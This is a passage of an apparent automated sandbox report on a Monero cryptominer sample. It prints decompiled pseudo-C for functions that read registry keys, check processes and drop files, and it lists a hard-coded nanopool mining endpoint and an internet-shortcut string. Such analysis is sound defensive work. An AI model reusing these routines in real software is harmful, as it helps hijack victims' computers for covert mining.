                                                                                                        • NtReadFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000CC8,00000000,00000000), ref: 00403927
                                                                                                        • NtClose.NTDLL(00000000), ref: 00403934
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00403942
                                                                                                        • NtClose.NTDLL(00000000), ref: 0040394F
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00403986
                                                                                                        • NtClose.NTDLL(00000000), ref: 00403999
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseVirtual$FreePath$AllocAttributesCreateNameName_ReadSize
                                                                                                        • String ID: 0125789244697858$@$lG@$xmr-us-east1.nanopool.org:14444
                                                                                                        • API String ID: 27938546-2795650337
                                                                                                        • Opcode ID: 1db646025260cd4b6ae9ac45ca5030c30e6a6c58ae7cead9cd14b8e1dcc3d868
                                                                                                        • Instruction ID: 5038ae2be3a5952dc9e1581431ce3c004cda8172756abbfe488321c7fd1decdf
                                                                                                        • Opcode Fuzzy Hash: 1db646025260cd4b6ae9ac45ca5030c30e6a6c58ae7cead9cd14b8e1dcc3d868
                                                                                                        • Instruction Fuzzy Hash: AF413DB0E41218BBEB209F94DD0AFDEBBB8AB04715F104167F504B52C0D7B95A488BA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 76%
                                                                                                        			E004085B0(void* __ecx, void* __eflags, long _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
                                                                                                        				void* _v8;
                                                                                                        				void* _v16;
                                                                                                        				void* _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				intOrPtr _v40;
                                                                                                        				intOrPtr _v44;
                                                                                                        				void* _v48;
                                                                                                        				intOrPtr _v240;
                                                                                                        				void _v248;
                                                                                                        				char _v1272;
                                                                                                        				short _v3320;
                                                                                                        				long _t35;
                                                                                                        				long _t53;
                                                                                                        				long _t58;
                                                                                                        
                                                                                                        				_v8 = 0;
                                                                                                        				E00401BB0( &_v3320, 0, 0x800);
                                                                                                        				_t35 = _a4;
                                                                                                        				if(_t35 != 0x80000002) {
                                                                                                        					if(_t35 != 0x80000001) {
                                                                                                        						goto L8;
                                                                                                        					} else {
                                                                                                        						E00401BB0( &_v1272, 0, 0x400);
                                                                                                        						if(E004082B0( &_v1272) == 0) {
                                                                                                        							goto L8;
                                                                                                        						} else {
                                                                                                        							E00401A00( &_v3320, L"\\Registry\\User\\");
                                                                                                        							E00401970( &_v3320,  &_v1272);
                                                                                                        							goto L5;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					E00401A00( &_v3320, L"\\Registry\\Machine");
                                                                                                        					L5:
                                                                                                        					E00401970( &_v3320, _a8);
                                                                                                        					asm("xorps xmm0, xmm0");
                                                                                                        					asm("movq [ebp-0xc], xmm0");
                                                                                                        					RtlInitUnicodeString( &_v16,  &_v3320);
                                                                                                        					_v48 = 0x18;
                                                                                                        					_v40 =  &_v16;
                                                                                                        					_v44 = 0;
                                                                                                        					_v36 = 0x40;
                                                                                                        					_v32 = 0;
                                                                                                        					_v28 = 0;
                                                                                                        					_t53 = NtOpenKey( &_v8, 0x20119,  &_v48); // executed
                                                                                                        					if(_t53 < 0) {
                                                                                                        						L8:
                                                                                                        						return 0;
                                                                                                        					} else {
                                                                                                        						asm("xorps xmm0, xmm0");
                                                                                                        						asm("movq [ebp-0x14], xmm0");
                                                                                                        						RtlInitUnicodeString( &_v24, _a12);
                                                                                                        						_t58 = NtQueryValueKey(_v8,  &_v24, 1,  &_v248, 0xc8,  &_a4); // executed
                                                                                                        						_push(_v8);
                                                                                                        						if(_t58 >= 0) {
                                                                                                        							NtClose();
                                                                                                        							E00401A00(_a16, _v240 +  &_v248);
                                                                                                        							return 1;
                                                                                                        						} else {
                                                                                                        							NtClose();
                                                                                                        							goto L8;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}


                                                                                                        APIs
                                                                                                        • RtlInitUnicodeString.NTDLL(?,?), ref: 00408677
                                                                                                        • NtOpenKey.NTDLL(00000000,00020119,00000018), ref: 004086B3
                                                                                                        • RtlInitUnicodeString.NTDLL(75144D40,00000000), ref: 004086CC
                                                                                                        • NtQueryValueKey.NTDLL(00000000,75144D40,00000001,?,000000C8,00404596), ref: 004086EB
                                                                                                        • NtClose.NTDLL(00000000), ref: 004086F8
                                                                                                        • NtClose.NTDLL(00000000), ref: 00408704
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseInitStringUnicode$OpenQueryValue
                                                                                                        • String ID: @$\Registry\Machine$\Registry\User\
                                                                                                        • API String ID: 2538698014-2338602205
                                                                                                        • Opcode ID: 1e4a2f9ca1f13b42ab8a43e3d6aa5f8f717dc5ca93966d64937e1c4d3befbe2b
                                                                                                        • Instruction ID: d2628628a94712c675b0c195a5174935581fdd4bc81ba0214100a7ffc09d6dc1
                                                                                                        • Opcode Fuzzy Hash: 1e4a2f9ca1f13b42ab8a43e3d6aa5f8f717dc5ca93966d64937e1c4d3befbe2b
                                                                                                        • Instruction Fuzzy Hash: 1C412FB1D4020EABDB10DBA0CD45FEE77BCAF14308F1045B6F904F2191EB799A589B59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 79%
                                                                                                        			E00402E40(void* __ecx, intOrPtr _a4, void* _a8) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				long _v12;
                                                                                                        				intOrPtr _v16;
                                                                                                        				short _v18;
                                                                                                        				char _v20;
                                                                                                        				long _v24;
                                                                                                        				long _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				char* _v36;
                                                                                                        				long _v40;
                                                                                                        				void* _v44;
                                                                                                        				short _t35;
                                                                                                        				long _t41;
                                                                                                        				void* _t44;
                                                                                                        				void* _t48;
                                                                                                        				void* _t50;
                                                                                                        				void* _t54;
                                                                                                        				intOrPtr* _t57;
                                                                                                        				void* _t62;
                                                                                                        
                                                                                                        				_t54 = __ecx;
                                                                                                        				_v12 = 0;
                                                                                                        				if(_a8 != 0) {
                                                                                                        					 *0x5d1134 = 0;
                                                                                                        					goto L4;
                                                                                                        				} else {
                                                                                                        					_t48 =  *0x5d1134; // 0x3430000
                                                                                                        					if(_t48 == 0) {
                                                                                                        						L4:
                                                                                                        						_t62 =  *( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14)))) + 0x10);
                                                                                                        						if(_t62 != 0) {
                                                                                                        							_v8 = E00402F80(_t54, _t62, "NtOpenSection");
                                                                                                        							_t50 = E00402F80(_t54, _t62, "NtMapViewOfSection");
                                                                                                        							_t57 = E00402F80(_t54, _t62, "NtClose");
                                                                                                        							if(_v8 == 0 || _t50 == 0) {
                                                                                                        								L12:
                                                                                                        								return 0;
                                                                                                        							} else {
                                                                                                        								_t55 = _a4;
                                                                                                        								_v16 = _a4;
                                                                                                        								_t35 = (E00401B40(_a4) & 0x0000ffff) + (E00401B40(_a4) & 0x0000ffff);
                                                                                                        								_v44 = 0x18;
                                                                                                        								_v20 = _t35;
                                                                                                        								_v18 = _t35;
                                                                                                        								_v36 =  &_v20;
                                                                                                        								_v40 = 0;
                                                                                                        								_v32 = 0x40;
                                                                                                        								_v28 = 0;
                                                                                                        								_v24 = 0;
                                                                                                        								if(NtOpenSection( &_a8, 0xc,  &_v44) >= 0) {
                                                                                                        									_t41 = NtMapViewOfSection(_a8, 0xffffffff, 0x5d1134, 0, 0, 0,  &_v12, 1, 0, 2); // executed
                                                                                                        									_push(_a8);
                                                                                                        									if(_t41 >= 0) {
                                                                                                        										if( *0x5d1134 == 0) {
                                                                                                        											goto L11;
                                                                                                        										} else {
                                                                                                        											NtClose();
                                                                                                        											_t44 =  *0x5d1134; // 0x3430000
                                                                                                        											return _t44;
                                                                                                        										}
                                                                                                        									} else {
                                                                                                        										L11:
                                                                                                        										 *_t57();
                                                                                                        										goto L12;
                                                                                                        									}
                                                                                                        								} else {
                                                                                                        									E00402DD0(_t55);
                                                                                                        									 *0x5d1134 = _t62;
                                                                                                        									return _t62;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							return 0;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						return _t48;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}























                                                                                                        APIs
                                                                                                        • NtOpenSection.NTDLL(00000000,0000000C,00000018,?,?,?,?,75144D40,00000000,00000000), ref: 00402F15
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: OpenSection
                                                                                                        • String ID: @$NtClose$NtMapViewOfSection$NtOpenSection
                                                                                                        • API String ID: 1950954290-3069760132
                                                                                                        • Opcode ID: 17615c4fecd44b4c39521a1cccd82976107e2cb8dff730541d4d008ca0a3743f
                                                                                                        • Instruction ID: 4647d7da09d8d8885e3b0c4b8fe7eb1682a85353f2c0fdbf0df9b865095ef5b3
                                                                                                        • Opcode Fuzzy Hash: 17615c4fecd44b4c39521a1cccd82976107e2cb8dff730541d4d008ca0a3743f
                                                                                                        • Instruction Fuzzy Hash: 1D319371A01219ABDB10DFA9DD45BDEB7B8EB04714F10416BE908F72C0D7B99A04DB98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 20%
                                                                                                        			E00407AF0(WCHAR* _a4, intOrPtr _a8) {
                                                                                                        				void* _v8;
                                                                                                        				long _v12;
                                                                                                        				void* _v16;
                                                                                                        				long _v20;
                                                                                                        				char _v24;
                                                                                                        				long _v28;
                                                                                                        				void* _v32;
                                                                                                        				long _v36;
                                                                                                        				long _v40;
                                                                                                        				long _v44;
                                                                                                        				long _v48;
                                                                                                        				intOrPtr _v52;
                                                                                                        				char* _v56;
                                                                                                        				long _v60;
                                                                                                        				void* _v64;
                                                                                                        				signed char _t35;
                                                                                                        				signed int _t36;
                                                                                                        				long _t45;
                                                                                                        				void* _t48;
                                                                                                        				void* _t54;
                                                                                                        
                                                                                                        				_t35 = GetFileAttributesW(_a4); // executed
                                                                                                        				// The file is only (re)written when the path does not exist (0xffffffff)
                                                                                                        				// or is a directory (attribute 0x10); an existing regular file is left
                                                                                                        				// untouched and reported as success.
                                                                                                        				if(_t35 == 0xffffffff || (_t35 & 0x00000010) != 0) {
                                                                                                        					asm("xorps xmm0, xmm0");
                                                                                                        					_v8 = 0;
                                                                                                        					_v64 = 0;
                                                                                                        					asm("movups [ebp-0x38], xmm0");
                                                                                                        					_v44 = 0;
                                                                                                        					_v16 = 0;
                                                                                                        					_v12 = 0;
                                                                                                        					_v40 = 0;
                                                                                                        					_v36 = 0;
                                                                                                        					_v32 = 0;
                                                                                                        					_v28 = 0;
                                                                                                        					_t36 = E00401B40(_a8); // appears to return the character count of the string at _a8
                                                                                                        					_v20 = 0;
                                                                                                        					asm("xorps xmm0, xmm0");
                                                                                                        					asm("movq [ebp-0x14], xmm0");
                                                                                                        					_t54 = 2 + _t36 * 2; // bytes to write: wide characters plus the terminator
                                                                                                        					_push(0);
                                                                                                        					_push(0);
                                                                                                        					_push( &_v24);
                                                                                                        					_push(_a4);
                                                                                                        					// Indirect call through import slot 0x5d10b8, resolved in the API list
                                                                                                        					// below as RtlDosPathNameToNtPathName_U (ref 00407B84): converts the
                                                                                                        					// DOS path _a4 into the NT path UNICODE_STRING stored at _v24.
                                                                                                        					if( *0x5d10b8() != 1) {
                                                                                                        						L7:
                                                                                                        						return 0; // executed
                                                                                                        					} else {
                                                                                                        						// OBJECT_ATTRIBUTES on the stack: Length 0x18, ObjectName = &_v24,
                                                                                                        						// Attributes 0x40 (OBJ_CASE_INSENSITIVE).
                                                                                                        						_v64 = 0x18;
                                                                                                        						_v56 =  &_v24;
                                                                                                        						_v60 = 0;
                                                                                                        						_v52 = 0x40;
                                                                                                        						_v48 = 0;
                                                                                                        						_v44 = 0;
                                                                                                        						// DesiredAccess 0x120116 (FILE_GENERIC_WRITE), FileAttributes 0x80,
                                                                                                        						// ShareAccess 0, CreateDisposition 0 (FILE_SUPERSEDE: any existing file
                                                                                                        						// is replaced), CreateOptions 0x60 (FILE_SYNCHRONOUS_IO_NONALERT |
                                                                                                        						// FILE_NON_DIRECTORY_FILE).
                                                                                                        						_t45 = NtCreateFile( &_v8, 0x120116,  &_v64,  &_v16,  &_v32, 0x80, 0, 0, 0x60, 0, 0); // executed
                                                                                                        						if(_t45 != 0) {
                                                                                                        							goto L7;
                                                                                                        						} else {
                                                                                                        							// Indirect call through import slot 0x5d10c0, resolved below as
                                                                                                        							// NtWriteFile (ref 00407BFF): writes _t54 bytes from _a8 to the new file.
                                                                                                        							_t48 =  *0x5d10c0(_v8, 0, 0, 0,  &_v16, _a8, _t54,  &_v40, _t45); // executed
                                                                                                        							_push(_v8);
                                                                                                        							if(_t48 == 0) {
                                                                                                        								NtClose(); // executed
                                                                                                        								return 1;
                                                                                                        							} else {
                                                                                                        								NtClose();
                                                                                                        								goto L7;
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				} else {
                                                                                                        					return 1;
                                                                                                        				}
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,0040685B,?,?,?,.exe",?,?,?,[InternetShortcut]URL="file:///), ref: 00407AF9
                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 00407B84
                                                                                                        • NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00407BDF
                                                                                                        • NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00407BFF
                                                                                                        • NtClose.NTDLL(00000000), ref: 00407C0C
                                                                                                        • NtClose.NTDLL(00000000), ref: 00407C19
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$ClosePath$AttributesCreateNameName_Write
                                                                                                        • String ID: @
                                                                                                        • API String ID: 2032416576-2766056989
                                                                                                        • Opcode ID: b68e2da1d8a01fec83c1ced52e1a281f962c96c99bbb349389263c075fbb7d0c
                                                                                                        • Instruction ID: 9f52158c82e738a9b8372dbf463c3a00265b35efd882e416b0d337a0f99a21ed
                                                                                                        • Opcode Fuzzy Hash: b68e2da1d8a01fec83c1ced52e1a281f962c96c99bbb349389263c075fbb7d0c
                                                                                                        • Instruction Fuzzy Hash: 0E314270D4020CBBEF10DF90DD49BDEBBB8EB04314F208256F904B62D0D7B66A989B95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 35%
                                                                                                        			E00403BC0(char _a4) {
                                                                                                        				void* _v8;
                                                                                                        				long _v12;
                                                                                                        				void* _v16;
                                                                                                        				long _v20;
                                                                                                        				void* _v24;
                                                                                                        				long _v28;
                                                                                                        				long _v32;
                                                                                                        				long _v36;
                                                                                                        				long _v40;
                                                                                                        				intOrPtr _v44;
                                                                                                        				char* _v48;
                                                                                                        				long _v52;
                                                                                                        				void* _v56;
                                                                                                        				long _t29;
                                                                                                        				void* _t33;
                                                                                                        
                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                        				_v36 = 0;
                                                                                                        				asm("movups [ebp-0x30], xmm0");
                                                                                                        				_v8 = 0;
                                                                                                        				_v48 =  &_a4; // ObjectName points at the argument block, which appears to be a UNICODE_STRING passed by value
                                                                                                        				_v16 = 0;
                                                                                                        				_v12 = 0;
                                                                                                        				_v24 = 0;
                                                                                                        				_v20 = 0;
                                                                                                        				_v32 = 0;
                                                                                                        				_v28 = 0;
                                                                                                        				// OBJECT_ATTRIBUTES: Length 0x18, Attributes 0x40 (OBJ_CASE_INSENSITIVE).
                                                                                                        				_v56 = 0x18;
                                                                                                        				_v52 = 0;
                                                                                                        				_v44 = 0x40;
                                                                                                        				_v40 = 0;
                                                                                                        				_v36 = 0;
                                                                                                        				// Same NtCreateFile parameters as E00407AF0 above: FILE_GENERIC_WRITE (0x120116),
                                                                                                        				// FILE_SUPERSEDE (disposition 0), CreateOptions 0x60.
                                                                                                        				_t29 = NtCreateFile( &_v8, 0x120116,  &_v56,  &_v16,  &_v24, 0x80, 0, 0, 0x60, 0, 0); // executed
                                                                                                        				if(_t29 != 0) {
                                                                                                        					L3:
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					// Import slot 0x5d10c0 is the same one resolved as NtWriteFile in E00407AF0:
                                                                                                        					// 0xcc8 bytes are written starting at the embedded pool string
                                                                                                        					// "xmr-us-east1.nanopool.org:14444", i.e. the data beginning with the
                                                                                                        					// mining-pool endpoint is dropped to disk as a file.
                                                                                                        					_t33 =  *0x5d10c0(_v8, 0, 0, 0,  &_v16, "xmr-us-east1.nanopool.org:14444", 0xcc8,  &_v32, _t29); // executed
                                                                                                        					_push(_v8);
                                                                                                        					if(_t33 == 0) {
                                                                                                        						NtClose();
                                                                                                        						return 1;
                                                                                                        					} else {
                                                                                                        						NtClose();
                                                                                                        						goto L3;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}

APIs
• NtCreateFile.NTDLL(00000000,00120116,?,00403B8C,?,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00403C52
• NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,xmr-us-east1.nanopool.org:14444,00000CC8,00000000,00000000), ref: 00403C78
• NtClose.NTDLL(00000000), ref: 00403C85
• NtClose.NTDLL(00000000), ref: 00403C91
Memory Dump Source
• Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseFile$CreateWrite
• String ID: @$xmr-us-east1.nanopool.org:14444
• API String ID: 3559581051-493715795
• Opcode ID: 56d88aa81e982c61328a5cbb6ae928bc3dbf0937083e45afe5ced92eb89ea321
• Instruction ID: 92c5b12b779cf31cce4769230797ba73a26a306a4adc66bd02839d29b74e70ae
• Opcode Fuzzy Hash: 56d88aa81e982c61328a5cbb6ae928bc3dbf0937083e45afe5ced92eb89ea321
• Instruction Fuzzy Hash: A521EDB1E4120DBBEB10DF90DD49BDFBBB8EB04704F204256F904B62C0D7B95A489B99
Uniqueness
• Uniqueness Score: -1.00%

APIs
• NtCreateFile.NTDLL(005D2DF0,00120089,?,]D@,00000000,00000080,00000001,00000001,00000060,00000000,00000000), ref: 004037A4
• NtCreateFile.NTDLL(005D2124,00120089,?,]D@,00000000,00000080,00000001,00000001,00000060,00000000,00000000), ref: 004037C1
Memory Dump Source
• Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CreateFile
• String ID: @$]D@
• API String ID: 823142352-925688143
• Opcode ID: 03611e97650f41380acb2e73d0c1b10cf4d46751ae042211fc88b9fc410341d6
• Instruction ID: 29e337131a3785b045790d3cbff8cd25c944f4b1d8e7a2be103306273d9b840e
• Opcode Fuzzy Hash: 03611e97650f41380acb2e73d0c1b10cf4d46751ae042211fc88b9fc410341d6
• Instruction Fuzzy Hash: CD118FB0A4130DABEB20DF90CD49BDEBBF8BB18315F10835BE514B62C0D7B556488B98
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 18%
E00406990(char _a4) {
	char _v12;
	long _v16;
	void* _v20;
	long _v24;
	void* _v28;
	long _v32;
	long _v36;
	intOrPtr _v40;
	char* _v44;
	long _v48;
	void* _v52;
	long _t25;

	_t1 =  &_v12; // 0x406875
	_v52 = 0;
	_t3 =  &_a4; // 0x406875
	asm("xorps xmm0, xmm0");
	_v32 = 0;
	asm("movups [ebp-0x2c], xmm0");
	_v28 = 0;
	_v24 = 0;
	_v20 = 0;
	_v16 = 0;
	asm("movq [ebp-0x8], xmm0");
	 *0x5d10b8( *_t3, _t1, 0, 0);
	_v52 = 0x18;
	_v44 =  &_v12;
	_v48 = 0;
	_v40 = 0x40;
	_v36 = 0;
	_v32 = 0;
	_t25 = NtCreateFile(0x5d2dfc, 0x120089,  &_v52,  &_v28,  &_v20, 0x80, 0, 1, 0x60, 0, 0); // executed
	return _t25;
}

APIs
• RtlDosPathNameToNtPathName_U.NTDLL(uh@,uh@,00000000,00000000), ref: 004069D7
• NtCreateFile.NTDLL(005D2DFC,00120089,00000018,00000000,00000000,00000080,00000000,00000001,00000060,00000000,00000000), ref: 00406A2B
Memory Dump Source
• Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Path$CreateFileNameName_
• String ID: uh@$uh@
• API String ID: 3479931691-972736353
• Opcode ID: 45a6eada9ea1dd906960385c986ed5d86993abecfb8ffa17f30c1ee7e5eb38c1
• Instruction ID: 0c139073421148209480b6c35fda580d69656a2aecaa2f90744c4bda58df8354
• Opcode Fuzzy Hash: 45a6eada9ea1dd906960385c986ed5d86993abecfb8ffa17f30c1ee7e5eb38c1
• Instruction Fuzzy Hash: E811DBB4D5031DABEB10DF90CD49BEEBBB8BB04704F10420AE9007A2C0D7B522988F99
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 82%
E00403B50(void* __edx, char _a4, intOrPtr _a8) {
	void* _t6;
	void* _t7;
	void* _t11;
	void* _t12;
	void* _t13;
	void* _t14;

	_t11 = __edx;
	E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444", 0xcc8);
	_t6 =  *0x5d2df4; // 0x320
	_t13 = _t12 + 0x10;
	if(_t6 != 0 && _t6 != 0xffffffff) {
		NtClose(_t6);
	}
	_push(_a8);
	_t7 = E00403BC0(_a4); // executed
	_t14 = _t13 + 8;
	if(_t7 != 0) {
		_push(_a8);
		E00403680(_t11, _a4); // executed
		_t14 = _t14 + 8;
	}
	return E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444", 0xcc8);
}

Memory Dump Source
• Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Close
• String ID: 0125789244697858$0125789244697858$xmr-us-east1.nanopool.org:14444
• API String ID: 3535843008-899868268
• Opcode ID: 05ddcafc9e6955f83f09dbcfd663fe33b0abdaadcb5b8f1db937436fe77c1a83
• Instruction ID: b842e7685c2f69810a8eda15092c5b8a142aacb66778a7cb45de6b9a8cdd56ec
• Opcode Fuzzy Hash: 05ddcafc9e6955f83f09dbcfd663fe33b0abdaadcb5b8f1db937436fe77c1a83
• Instruction Fuzzy Hash: 5EF0B43168120476EF203F999C03E493E585B2475EF004527FE18742E3E5BAD275955E
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 63%
E00408A50(void* _a4) {
	long _v8;
	long _v12;
	void* _v16;
	long _v20;
	long _v24;
	long _v28;
	long _v32;
	long _v36;
	void* _v40;
	void* _t21;
	void* _t27;
	int _t28;

	_t21 = _a4;
	if(_t21 != 0) {
		_v16 = _t21;
		_a4 = 0;
		_v40 = 0x18;
		_v36 = 0;
		_v28 = 0;
		_v32 = 0;
		_v24 = 0;
		_v20 = 0;
		_v12 = 0;
		if(NtOpenProcess( &_a4, 0x400,  &_v40,  &_v16) != 0) {
			goto L1;
		} else {
			_t27 = _a4;
			if(_t27 == 0) {
				goto L1;
			} else {
				_v8 = 0;
				_t28 = GetExitCodeProcess(_t27,  &_v8); // executed
				_push(_a4);
				if(_t28 != 0) {
					NtClose(); // executed
					return 0 | _v8 == 0x00000103;
				} else {
					return NtClose() | 0xffffffff; // executed
				}
			}
		}
	} else {
		L1:
		return 0;
	}
}

                                                                                                        APIs
                                                                                                        • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00408AAF
                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 00408ACC
                                                                                                        • NtClose.NTDLL(00000000), ref: 00408AD9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$CloseCodeExitOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2358878597-0
                                                                                                        • Opcode ID: 68b3489fe5460219a3091c2dd7fb609aeb590185205d4daf2d69748998342c46
                                                                                                        • Instruction ID: 1b6c16884e814be030dd65664031e946cab864b4b59cb1ac47a8a8f8596fd444
                                                                                                        • Opcode Fuzzy Hash: 68b3489fe5460219a3091c2dd7fb609aeb590185205d4daf2d69748998342c46
                                                                                                        • Instruction Fuzzy Hash: 55111F71A0120CAFDF10DFA0C9487EE7BF8AB04354F10456AE818E6280EB799B48DF95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 16%
                                                                                                        			E004068E0(intOrPtr _a4) {
                                                                                                        				char _v12;
                                                                                                        				long _v16;
                                                                                                        				void* _v20;
                                                                                                        				long _v24;
                                                                                                        				void* _v28;
                                                                                                        				long _v32;
                                                                                                        				long _v36;
                                                                                                        				intOrPtr _v40;
                                                                                                        				char* _v44;
                                                                                                        				long _v48;
                                                                                                        				void* _v52;
                                                                                                        				long _t25;
                                                                                                        
                                                                                                        				_v52 = 0;
                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                        				_v32 = 0;
                                                                                                        				asm("movups [ebp-0x2c], xmm0");
                                                                                                        				_v28 = 0;
                                                                                                        				_v24 = 0;
                                                                                                        				_v20 = 0;
                                                                                                        				_v16 = 0;
                                                                                                        				asm("movq [ebp-0x8], xmm0");
                                                                                                        				 *0x5d10b8(_a4,  &_v12, 0, 0); // indirect call through an import slot: RtlDosPathNameToNtPathName_U (see APIs below) turns the DOS path in _a4 into the UNICODE_STRING at _v12
                                                                                                        				_v52 = 0x18; // OBJECT_ATTRIBUTES.Length: 24 bytes on 32-bit Windows
                                                                                                        				_v44 =  &_v12; // OBJECT_ATTRIBUTES.ObjectName -> the NT path built above
                                                                                                        				_v48 = 0; // RootDirectory = NULL
                                                                                                        				_v40 = 0x40; // Attributes = OBJ_CASE_INSENSITIVE
                                                                                                        				_v36 = 0; // SecurityDescriptor = NULL
                                                                                                        				_v32 = 0; // SecurityQualityOfService = NULL
                                                                                                        				_t25 = NtCreateFile(0x5d2df8, 0x120089,  &_v52,  &_v28,  &_v20, 0x80, 0, 1, 0x60, 0, 0); // executed
                                                                                                        				// FileHandle -> global 0x5d2df8; DesiredAccess 0x120089 = FILE_GENERIC_READ; FileAttributes 0x80 = FILE_ATTRIBUTE_NORMAL;
                                                                                                        				// ShareAccess 0 (no sharing); CreateDisposition 1 = FILE_OPEN (existing file only); CreateOptions 0x60 = FILE_SYNCHRONOUS_IO_NONALERT | FILE_NON_DIRECTORY_FILE
                                                                                                        				return _t25;
                                                                                                        			}

                                                                                                        APIs
                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(004068C5,004068C5,00000000,00000000), ref: 00406927
                                                                                                        • NtCreateFile.NTDLL(005D2DF8,00120089,00000018,00000000,00000000,00000080,00000000,00000001,00000060,00000000,00000000), ref: 0040697B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$CreateFileNameName_
                                                                                                        • String ID: @
                                                                                                        • API String ID: 3479931691-2766056989
                                                                                                        • Opcode ID: 16fa837f9bc0ff09cc67a8f66bfc36083248c74de5f80e8970ab7ff66bd66588
                                                                                                        • Instruction ID: fb5b581ab8e3c93d90c851d27248355ddc5a87700a0b749ee16a3b9d52e94ed7
                                                                                                        • Opcode Fuzzy Hash: 16fa837f9bc0ff09cc67a8f66bfc36083248c74de5f80e8970ab7ff66bd66588
                                                                                                        • Instruction Fuzzy Hash: FC11DBB4D5031DABEB10DF90CD49BEEBBB8BB04704F10420AE9107A2C0D7B522888F99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 86%
                                                                                                        			E00403680(signed int __edx, char _a4) {
                                                                                                        				long _v8;
                                                                                                        				void* _v12;
                                                                                                        				long _v16;
                                                                                                        				void* _v20;
                                                                                                        				long _v24;
                                                                                                        				long _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				char* _v36;
                                                                                                        				long _v40;
                                                                                                        				void* _v44;
                                                                                                        				long _t20;
                                                                                                        				void* _t21;
                                                                                                        				signed int _t23;
                                                                                                        
                                                                                                        				_t23 = __edx;
                                                                                                        				asm("xorps xmm0, xmm0");
                                                                                                        				_v24 = 0;
                                                                                                        				asm("movups [ebp-0x24], xmm0");
                                                                                                        				_v20 = 0;
                                                                                                        				_v36 =  &_a4;
                                                                                                        				_v16 = 0;
                                                                                                        				_v12 = 0;
                                                                                                        				_v8 = 0;
                                                                                                        				_v44 = 0x18;
                                                                                                        				_v40 = 0;
